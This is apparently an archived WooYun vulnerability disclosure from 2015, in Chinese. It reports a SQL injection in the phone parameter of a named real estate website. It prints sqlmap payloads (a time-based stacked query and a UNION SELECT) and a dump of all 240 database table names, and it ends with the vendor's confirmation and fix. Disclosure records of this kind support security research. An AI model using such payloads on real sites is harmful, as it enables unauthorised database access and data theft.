乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-03: 细节已通知厂商并且等待厂商处理中 2015-10-06: 厂商已经确认,细节仅向厂商公开 2015-10-16: 细节向核心白帽子及相关领域专家公开 2015-10-26: 细节向普通白帽子公开 2015-11-05: 细节向实习白帽子公开 2015-11-20: 细节向公众公开
http://fang.hualongxiang.com/find/2?phone=555-666-0606
sqlmap resumed the following injection point(s) from stored session:---Parameter: phone (GET) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: phone=555-666-0606';(SELECT * FROM (SELECT(SLEEP(5)))aDow)# Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: phone=555-666-0606' UNION ALL SELECT CONCAT(0x7162626b71,0x457453705159534c694c,0x7170766271),NULL,NULL,NULL,NULL,NULL,NULL-- ---back-end DBMS: MySQL 5.0.11Database: hlxapp[240 tables]+--------------------------------+| session || ad_advent || ad_bx || ad_cfirm || ad_class || ad_ind || ad_menu || ad_mes || ad_user || bk_mes || bk_nback || bosslog || euro_games || euro_guess || euro_guesscount || feeback_class || feeback_data || hsk_booking || hsk_category || hsk_msg || hsk_shopinfo || module_adsarea || module_adsview || module_analytic || module_appoint_queue || module_article || module_article_category || module_article_source || module_black || module_call_log || module_car_artrecom || module_car_configs || module_car_dis || module_car_disrelation || module_car_due || module_car_hd_atlas || module_car_hd_case || module_car_hd_pic || module_car_hd_store || module_car_houdao || module_car_images || module_car_model || module_car_order || module_car_promo || module_car_recom || module_car_relation || module_car_reply || module_car_series || module_car_shop || module_car_shopcon || module_category || module_chest || module_cms_admin || module_cms_category || module_cms_content || module_collect || module_comments || module_coupons || module_edu_due || module_edu_qiuxue || module_edu_train || module_erp_loginlog || module_erp_refreshlog || module_family_album || module_family_ask || module_family_askcate || module_family_atlas || module_family_case || module_family_images || module_family_order || module_family_order_rel || module_family_pic || module_family_plot || module_family_pump || module_family_reply || module_family_shop || module_family_store || module_family_tag || module_family_tag_category || module_family_tag_relation || module_family_team || module_family_visit || module_family_work || module_forms || module_gift || module_go || module_goodinfo || module_groups || module_hit_count || module_house_activities || module_house_appoint || module_house_buy || module_house_daily || module_house_extension || module_house_extension_sms || module_house_images || module_house_info || module_house_jike || module_house_jike_log || module_house_jike_plot || module_house_jike_source || module_house_log || module_house_peizhi || module_house_peizhi_relation || module_house_priceinfo || module_house_report || module_house_sale || module_house_school || module_house_school_relation || module_house_shop_extra || module_house_staff_extra || module_house_tag || module_house_tag_type || module_house_tuan || module_house_wenda || module_house_wenda_category || module_house_yzm || module_images || module_invite || module_jifen_exchange || module_jifen_goods || module_jifen_images || module_jifen_user || module_keyword || module_live || module_live_pic || module_liveinfo || module_lott_info || module_lott_invite || module_lott_option || module_lott_value || module_ly_action_log || module_ly_customer_asks || module_ly_customer_collections || module_ly_customer_infos || module_ly_line || module_ly_linedate || module_ly_linedue || module_ly_linetravel || module_ly_pos || module_ly_qq_log || module_ly_recs || module_ly_search_count || module_ly_search_detail || module_ly_tag_lists || module_ly_tag_relationships || module_ly_visa || module_ly_visa_due || module_marry_album || module_marry_album_tmp || module_marry_cate || module_marry_click || module_marry_ding || module_marry_ding_relation || module_marry_due || module_marry_extension || module_marry_hc || module_marry_image || module_marry_log || module_marry_logg || module_marry_order || module_marry_order_ext || module_marry_order_relation || module_marry_page || module_marry_recommend || module_marry_shop || module_marry_user || module_marry_visit || module_members || module_message || module_money || module_notice || module_options || module_page || module_pai_info || module_pai_members || module_pai_relation || module_pai_value || module_phone || module_recommend || module_sale_brand || module_sale_cate || module_sale_due || module_sale_forms || module_sale_option || module_sale_type || module_sellrecord || module_shop || module_shop_qq_hits || module_signbar || module_special || module_staff || module_tag || module_tags || module_tags_relation || module_tour_area || module_tour_line || module_tour_linedate || module_tour_linedue || module_tour_linetravel || module_tour_place || module_values || plot_sale || plot_sale_right || plot_temp || reg_active || reg_admin || reg_group || reg_order || reg_pay || reg_reward || reg_shop || reg_sign || reg_user || s_forbid_fid || s_forbid_tid || s_kword || s_kword_ad || s_uslog || sqlmapfile || veryide_admins || veryide_admins_majia || veryide_cfiles || veryide_files || veryide_groups || veryide_logs || veryide_menus || veryide_sys || vol_admin || vol_events || vol_volunteer || wall_property || wall_user || wechat_actives || wechat_activevotes || wechat_floors || wechat_records || wechat_threads || wechat_userbind || wechat_userstatus |+--------------------------------+
危害等级:中
漏洞Rank:10
确认时间:2015-10-06 16:01
感谢对化龙巷安全的关注,确认存在漏洞,目前已修复!
暂无